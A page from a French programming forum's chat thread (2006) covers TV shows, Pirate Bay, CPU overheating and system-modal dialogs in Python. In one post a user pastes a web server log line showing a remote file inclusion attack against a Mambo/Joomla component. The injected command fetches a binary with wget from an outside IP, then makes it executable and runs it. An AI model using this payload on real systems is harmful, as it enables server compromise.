Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
3008 connectés 

Sujet(s) à lire :
    - Who's who@Programmation

Mot :   Pseudo :  
  Aller à la page :

Page :   1  2  3  4  5  ..  10326  10327  10328  ..  26979  26980  26981  26982  26983  26984
Auteur Sujet :

[blabla@olympe] Le topic du modo, dieu de la fibre et du monde

n°1385079
masklinn
í dag viðrar vel til loftárása
Posté le 10-06-2006 à 13:20:49  profilanswer

Reprise du message précédent :

Elmoricq a écrit :

J'adore (même s'il reste un quart que je ne comprends pas à cause de mon anglais défectueux)

Avant yen avait pas mal en entier sur TPB (de Colbert Report), mais avec les évènements récents j'ai l'impression qu'ils ont tous été perdus :/

---------------
I mean, true, a cancer will probably destroy its host organism. But what about the cells whose mutations allow them to think outside the box by throwing away the limits imposed by overbearing genetic regulations? Isn't that a good thing?
mood
Publicité
Posté le 10-06-2006 à 13:20:49  profilanswer

n°1385088
skeye
Posté le 10-06-2006 à 13:38:59  profilanswer

lorill a écrit :

rollers roulaizent :o

[:atsuko]

Tristou a écrit :

pétage de gueule aussi [:petrus75]

Aussi...plus qu'une semaine à pas bouger le doigt! [:jar jar]

---------------
Can't buy what I want because it's free -
n°1385094
masklinn
Posté le 10-06-2006 à 14:01:36  profilanswer

[NSFW] (à cause des pubs) pour le Colbert Report: http://torrentreactor.net/sections.php?id=584

---------------
I mean, true, a cancer will probably destroy its host organism. But what about the cells whose mutations allow them to think outside the box by throwing away the limits imposed by overbearing genetic regulations? Isn't that a good thing?
n°1385096
Elmoricq
Modérateur
Posté le 10-06-2006 à 14:08:42  profilanswer

Zzozo a écrit :

Les bons outils ne compensent pas l'absence de rigueur, de travail, et un peu de talent  [:petrus75]

Les deux, c'est préférable.

J'me sens tout illuminé de sagesse, là  [:blackman]

n°1385106
gm_superst​ar
Appelez-moi Super
Posté le 10-06-2006 à 14:46:13  profilanswer

:hello: tout le monde

el muchacho a écrit :

Je subodore qu'il y a un message caché dans ton spoiler. Qu'es-tu donc allé faire à SQY ?

Non rien de spécial, c'était pour le boulot (le responsable commercial qui nous accompagnait devait aller rassurer un client là bas. Il avait besoin d'un oeil externe au projet et c'est bibi qui s'y est collé).

Mais hélas, je n'ai pas aperçu une des plus éminente star du net francophone :whistle:

Message édité par gm_superstar le 10-06-2006 à 14:46:40

---------------
Incongru : une FAQ abandonnée sur les Standards du Web - FAQ périmée de blabla@Prog
n°1385111
tholdan
Posté le 10-06-2006 à 15:09:41  profilanswer

200.19.108.4 - - [08/Jun/2006:22:57:16 +0200] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;./lnikon;echo%20YYY;echo|  HTTP/1.1" 200 1345 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

wtf

---------------
Ph'nglui mglw'nafh Cthulhu R'lyeh wgah'nagl fhtagn
n°1385114
el muchach​o
Comfortably Numb
Posté le 10-06-2006 à 15:13:15  profilanswer

Elmoricq a écrit :

J'adore (même s'il reste un quart que je ne comprends pas à cause de mon anglais défectueux)

Il y a qqs blagues ou allusions que je ne comprends pas non plus, mais c'est pas trop gênant.

Citation :

Avant yen avait pas mal en entier sur TPB (de Colbert Report), mais avec les évènements récents j'ai l'impression qu'ils ont tous été perdus :/

TPB ??? Kezako ?
Quels événements récents ?? Le speech du dîner des correspondants ?

Citation :

Mais hélas, je n'ai pas aperçu une des plus éminente star du net francophone :whistle:

Il est où au fait, le père kadreg ? En vacances ?

Message cité 3 fois
Message édité par el muchacho le 10-06-2006 à 15:16:46

---------------
Les aéroports où il fait bon attendre, voila un topic qu'il est bien
n°1385115
Tristou
Keep calm and hack cookies
Posté le 10-06-2006 à 15:14:36  profilanswer

skeye a écrit :

Aussi...plus qu'une semaine à pas bouger le doigt! [:jar jar]

Après tu fais un autre doigt [:dawa] ?

---------------
"About your cat Mr. Schrödinger : I have good news and bad news"
n°1385117
tholdan
Posté le 10-06-2006 à 15:18:25  profilanswer

el muchacho a écrit :

Il y a qqs blagues ou allusions que je ne comprends pas non plus, mais c'est pas trop gênant.

Citation :

TPB ??? Kezako ?

Citation :

Il est où au fait, le père kadreg ? En vacances ?

TPB = ThePirateBay gro noube [:icon8]

---------------
n°1385128
skeye
Posté le 10-06-2006 à 15:51:52  profilanswer

Tristou a écrit :

Après tu fais un autre doigt [:dawa] ?

euh si je pouvais éviter ça m'arrangerait...ça fait 2 semaines et je peux toujours pas plier celui-ci...[:pingouino]

---------------
mood
Publicité
Posté le 10-06-2006 à 15:51:52  profilanswer

n°1385129
Loom the G​loom
Even coders get the blues...
Posté le 10-06-2006 à 15:52:17  profilanswer

prems [:ezm]

---------------
Music|Market|Feed|Loom|DVD
n°1385130
darklord
You're welcome
Posté le 10-06-2006 à 15:59:25  profilanswer

pour ceux qui aiment le roller:
http://www.belgiumrollers.com/

au fait, yo :o

---------------
Just because you feel good does not make you right
n°1385132
Loom the G​loom
Even coders get the blues...
Posté le 10-06-2006 à 16:01:43  profilanswer

[:ohello]

---------------
Music|Market|Feed|Loom|DVD
n°1385133
skeye
Posté le 10-06-2006 à 16:02:34  profilanswer

darklord a écrit :

pour ceux les belges qui aiment le roller:
http://www.belgiumrollers.com/

au fait, yo :o

---------------
n°1385138
the real m​oins moins
Posté le 10-06-2006 à 16:09:53  profilanswer

ouais, rouler en troupeau, mené par cacarl de moncharlot, quel plaisir [:kiki]

---------------
Hey toi, tu veux acheter des minifigurines Lego, non ?
n°1385139
darklord
You're welcome
Posté le 10-06-2006 à 16:12:30  profilanswer

the real moins moins a écrit :

ouais, rouler en troupeau, mené par cacarl de moncharlot, quel plaisir [:kiki]

arrête un peu de faire ton vieux con.

Il est pas là, c'est sûr qu'il la ramène chaque fois qu'il peut mais en attendant c'est un event sympa et gratos. T'es pas obligé d'être copain avec lui hein.

---------------
Just because you feel good does not make you right
n°1385140
Harkonnen
Modérateur
Un modo pour les bannir tous
Posté le 10-06-2006 à 16:15:27  profilanswer

http://forum.hardware.fr/hardwaref [...] 2023-1.htm
topic prometteur  [:yopyop-]

---------------
J'ai un string dans l'array (Paris Hilton)
n°1385141
the real m​oins moins
Posté le 10-06-2006 à 16:16:15  profilanswer

non

---------------
n°1385146
Taiche
(╯°□°)╯︵ ┻━┻
Posté le 10-06-2006 à 16:33:36  profilanswer

Bon les gros, j'aurais besoin de conseils hardouères [:pingouino]
Donc ayé, i fait chaud, cai supaire, sauf que bin justement mon PC il a trop chaud :o Là en Idle, le CPU me fait du 56-57° et en Burn bin i se casse la tronche (écran bleu, port USB qui marche pu, conneries du genre) [:petrus75]
Le bouzin est un P4 550 à 3.4 GHz (Prescott, "Revision D0" me dit RMMA), non overclocké évidemment. Boîtier Lian Li 6099B (dont vous pouvez trouver un jouli test avec tout plein de description ici) qui me semble correctement ventilé mais chu pas expert (le boîtier est pas au ras du sol, y a des bouquins pour le surélever et les sorties/entrées d'air sont dégagées même si y a un peu de poussière dessus).
Ventilo CPU Cooler Master Hyper 48.

Ca me saoûle un brin, j'pensais pourtant que tout devait passer correctement et apparemment ba spa le cas :o

(EDIT : yaisse, 55 ° [:kbchris])

Message cité 2 fois
Message édité par Taiche le 10-06-2006 à 16:34:29

---------------
Everyone thinks of changing the world, but no one thinks of changing himself  |  It is the peculiar quality of a fool to perceive the faults of others and to forget his own  |  Early clumsiness is not a verdict, it’s an essential ingredient.
n°1385148
Harkonnen
Modérateur
Posté le 10-06-2006 à 16:36:07  profilanswer

éteins le et barre toi à la plage [:pingouino]

---------------
n°1385150
tholdan
Posté le 10-06-2006 à 16:39:26  profilanswer

C'est vraiment de la merde les P4 [:mlc] Ca chauffe et ça supporte pas la chaleur. [:mlc]
Moi mon A64 il est à 47° en idle, avec la tour posée par terre sur de la moquette, de la poussière à en crever dans les ventilos. [:mlc]
Et je peux monter facilement à 80° sans perte de stabilité.

---------------
n°1385152
Elmoricq
Modérateur
Posté le 10-06-2006 à 16:42:50  profilanswer

Harkonnen a écrit :

éteins le et barre toi à la plage [:pingouino]

Bon conseil. D'ailleurs je file acheter un new velo [:jar jar]

n°1385153
gocho
Posté le 10-06-2006 à 16:51:35  profilanswer

Taiche a écrit :

Donc ayé, i fait chaud, cai supaire, sauf que bin justement mon PC il a trop chaud :o Là en Idle, le CPU me fait du 56-57° et en Burn bin i se casse la tronche (écran bleu, port USB qui marche pu, conneries du genre) [:petrus75]
Le bouzin est un P4 550 à 3.4 GHz (Prescott, "Revision D0" me dit RMMA), non overclocké évidemment. Boîtier Lian Li 6099B (dont vous pouvez trouver un jouli test avec tout plein de description ici) qui me semble correctement ventilé mais chu pas expert (le boîtier est pas au ras du sol, y a des bouquins pour le surélever et les sorties/entrées d'air sont dégagées même si y a un peu de poussière dessus).

Ca me saoûle un brin, j'pensais pourtant que tout devait passer correctement et apparemment ba spa le cas :o

chais pas si ca existe l'un sans l'autre [:dawa]
Sinon pluzin pour tholdan! A64 powa [:greg2]

t'as pas moyen de mettre d'autres ventilos dans ta tour?ou des plus performants?

---------------
Mon feedback
n°1385155
the real m​oins moins
Posté le 10-06-2006 à 16:56:37  profilanswer

prend un mac

---------------
n°1385157
masklinn
Posté le 10-06-2006 à 17:03:22  profilanswer

el muchacho a écrit :

Citation :

TPB ??? Kezako ?

The Pirate Bay, et le raid policier chez leur hôte.

Mais en fait j'ai trouvé un autre lien où ils y sont tous (genre le dernier posté c'était celui du 8 juin).

Taiche a écrit :

Le premier truc à tenter ce serait de re-poser le rad sur le CPU: le démonter, tout bien nettoyer et essayer de le remonter au propre et nickel (ça veut dire sans trop de pâte thermique).

Si ton ventilo CPU est régulé, tu peux aussi essayer de monter sa vitesse de rotation.

Mais le truc c'est que les P4 sont pas censés crasher à des températures aussi basses (les vieux Athlons si par contre), donc voir également si ton northbridge ne chauffe pas trop... il est également possible que la sonde de ton CPU raconte des conneries btw, parce que 55°C pour un prescott ça fait un peu bas en fait [:petrus75]

Sinon la solution de barbare (mais qui marche) c'est d'underclocker et sous-volter ton CPU

tholdan a écrit :

C'est vraiment de la merde les P4 [:mlc] Ca chauffe et ça supporte pas la chaleur. [:mlc]
Moi mon A64 il est à 47° en idle, avec la tour posée par terre sur de la moquette, de la poussière à en crever dans les ventilos. [:mlc]

Mon A64 est à 38°C en idle sans Cool&Quiet [:petrusbranlette]

http://forums.somethingawful.com/s [...] id=1864582

Citation :

MacBooks are not supposed to get so hot that you can't touch them.

[People] are reporting temperatures as high as 85C without the thermal paste reapplication.

:whistle:
http://www.ifixit.com/Guide/85/images_large/44.jpg

Message cité 2 fois
Message édité par masklinn le 10-06-2006 à 17:05:15
n°1385158
the real m​oins moins
Posté le 10-06-2006 à 17:05:50  profilanswer

oui mais ils plantent pas pour autant [:dawa]

---------------
n°1385159
masklinn
Posté le 10-06-2006 à 17:09:13  profilanswer

the real moins moins a écrit :

oui mais ils plantent pas pour autant [:dawa]

À cause de SpeedStep, ça a rien à voire avec le fait que ce soit un mac [:dawa]

n°1385161
gocho
Posté le 10-06-2006 à 17:12:21  profilanswer

tiens masklinn tant que t'es la et que j'y suis...
Disons que j'affiche une MessageBox.
Je voudrais ne rien pouvoir faire d'autres que cliquer sur ok. stadire ne pas pouvoir aller sur poste de travail, ni quoi que ce soit.
C'est possible?

edit : en python bien sur :o

Message cité 1 fois
Message édité par gocho le 10-06-2006 à 17:12:53

---------------
Mon feedback
n°1385162
Taiche
(╯°□°)╯︵ ┻━┻
Posté le 10-06-2006 à 17:15:05  profilanswer

masklinn a écrit :

Le premier truc à tenter ce serait de re-poser le rad sur le CPU: le démonter, tout bien nettoyer et essayer de le remonter au propre et nickel (ça veut dire sans trop de pâte thermique).

Ouais, sbien possible, la dernière pose s'est faite y a un an environ (quand j'ai mis le Hyper-48, quoi).

masklinn a écrit :

Si ton ventilo CPU est régulé, tu peux aussi essayer de monter sa vitesse de rotation.

C'est à fond :D

masklinn a écrit :

Mais le truc c'est que les P4 sont pas censés crasher à des températures aussi basses (les vieux Athlons si par contre), donc voir également si ton northbridge ne chauffe pas trop... il est également possible que la sonde de ton CPU raconte des conneries btw, parce que 55°C pour un prescott ça fait un peu bas en fait [:petrus75]

Hmpf [:petrus75] Bin depuis 1 an et d'mi que je l'ai, j'me suis jamais tapé de plantage de ce genre (BSOD suivi de la souris qui marche plus (bien détectée par Ouinedoze et tout, c'est juste que le curseur bougeait pas [:pingouino])), alors que j'ai effectivement eu quelques pointes au-delà des 70°C l'année dernière.
P'têt c'est juste HoMM5 qui s'est cassé la gueule... mouirf.

masklinn a écrit :

Sinon la solution de barbare (mais qui marche) c'est d'underclocker et sous-volter ton CPU

Ouais borfe.
On va tenter le coup de la pâte thermique. Sinon, les série 900 (les Presler, c'est ça :??:), ils chauffent moins ou bien ?

---------------
Everyone thinks of changing the world, but no one thinks of changing himself  |  It is the peculiar quality of a fool to perceive the faults of others and to forget his own  |  Early clumsiness is not a verdict, it’s an essential ingredient.
n°1385163
Taiche
(╯°□°)╯︵ ┻━┻
Posté le 10-06-2006 à 17:15:38  profilanswer

gocho a écrit :

t'as pas moyen de mettre d'autres ventilos dans ta tour?ou des plus performants?

D'autres, non, des plus performants p'têt, j'y connais rien :D

---------------
n°1385164
Harkonnen
Modérateur
Posté le 10-06-2006 à 17:15:50  profilanswer

gocho a écrit :

tiens masklinn tant que t'es la et que j'y suis...
Disons que j'affiche une MessageBox.
Je voudrais ne rien pouvoir faire d'autres que cliquer sur ok. stadire ne pas pouvoir aller sur poste de travail, ni quoi que ce soit.
C'est possible?

edit : en python bien sur :o

oui, ta MessageBox doit etre modale

---------------
n°1385165
Taiche
(╯°□°)╯︵ ┻━┻
Posté le 10-06-2006 à 17:18:33  profilanswer

Harkonnen a écrit :

Modale de type System [:aloy]

---------------
n°1385166
Harkonnen
Modérateur
Posté le 10-06-2006 à 17:22:27  profilanswer

bug sur mon plugin corrigé \o/
si je locke pas quand j'accéde quasi simultanément à une classe qui ne supporte pas les accés multiples, forcément ça marche pas \o/
jvais pouvoir releaser le source à la demande de mareek \o/

---------------
n°1385167
R3g
fonctionnaire certifié ITIL
Posté le 10-06-2006 à 17:26:49  profilanswer

[:le kneu] pourquoi "à la demande marrek" ? Je crois que tout le monde sur ce topic t'as demandé le source un jour ou l'autre...

n°1385168
gocho
Posté le 10-06-2006 à 17:31:53  profilanswer

Harkonnen a écrit :

ben de ce que j'ai trouve, les win32api.MessageBox sont modales par defaut.
Le seul probleme c'est qu'elle le sont seulement pour le programme python, et non pour le systeme entier comme je le souhaite.
Taiche>j'vais essayer de voir ca

---------------
Mon feedback
n°1385169
el muchach​o
Comfortably Numb
Posté le 10-06-2006 à 17:36:15  profilanswer

masklinn a écrit :

The Pirate Bay, et le raid policier chez leur hôte.

Mais en fait j'ai trouvé un autre lien où ils y sont tous (genre le dernier posté c'était celui du 8 juin).

Intéressé je suis...
Moi, j'ai youtube où il y en a un certains nombres, mais c'est tout.

---------------
Les aéroports où il fait bon attendre, voila un topic qu'il est bien
n°1385170
tholdan
Posté le 10-06-2006 à 17:37:31  profilanswer

R3g a écrit :

[:le kneu] pourquoi "à la demande marrek" ? Je crois que tout le monde sur ce topic t'as demandé le source un jour ou l'autre...

+1 [:icon8]

---------------
n°1385171
Taiche
(╯°□°)╯︵ ┻━┻
Posté le 10-06-2006 à 17:38:51  profilanswer

gocho a écrit :

Le seul probleme c'est qu'elle le sont seulement pour le programme python, et non pour le systeme entier comme je le souhaite.
Taiche>j'vais essayer de voir ca

Ouais vala, c'est l'idée. Y a plusieurs niveaux de modalité (-sation ? -ture ? Breffe [:petrus75]) ; le type Application limite ta fenêtre à l'appli, alors que System c'est pour tout l'OS. Maintenant, j'y connais rien en Python et je sais pas comment ça se fait.
De plus, c'est pas dit que tu puisses bloquer toutes les interactions de l'utilisateur avec l'OS, surtout sur les Unix, je suis pas sûr que ça soit possible. A vérifier, donc.

---------------
n°1385172
tholdan
Posté le 10-06-2006 à 17:41:09  profilanswer

Taiche a écrit :

Ouais vala, c'est l'idée. Y a plusieurs niveaux de modalité (-sation ? -ture ? Breffe [:petrus75]) ; le type Application limite ta fenêtre à l'appli, alors que System c'est pour tout l'OS. Maintenant, j'y connais rien en Python et je sais pas comment ça se fait.
De plus, c'est pas dit que tu puisses bloquer toutes les interactions de l'utilisateur avec l'OS, surtout sur les Unix, je suis pas sûr que ça soit possible. A vérifier, donc.

Sisi sur gnome, genre quand tu lance une app qui requiert les droits root, t'as une fenetre et l'arrière plan se grise, c'est magnifique.

---------------
n°1385174
Taiche
(╯°□°)╯︵ ┻━┻
Posté le 10-06-2006 à 17:45:49  profilanswer

tholdan a écrit :

Sisi sur gnome, genre quand tu lance une app qui requiert les droits root, t'as une fenetre et l'arrière plan se grise, c'est magnifique.

Nan, j'parlais des Unix plus austères, comme Solaris ou HP-UX [:petrus75] On a ce souci au taf, une boîte modale sur ces OS n'est pas aussi restrictive que sur d'autres.

---------------
n°1385180
R3g
fonctionnaire certifié ITIL
Posté le 10-06-2006 à 18:03:14  profilanswer

ben sous solaris t'as pas gnome ?

mood
Publicité
Posté le   profilanswer

Page :   1  2  3  4  5  ..  10326  10327  10328  ..  26979  26980  26981  26982  26983  26984

Aller à :
Ajouter une réponse

Sujets relatifs
Plus de sujets relatifs à : [blabla@olympe] Le topic du modo, dieu de la fibre et du monde

Copyright © 1997-2025 Groupe LDLC (Signaler un contenu illicite / Données personnelles)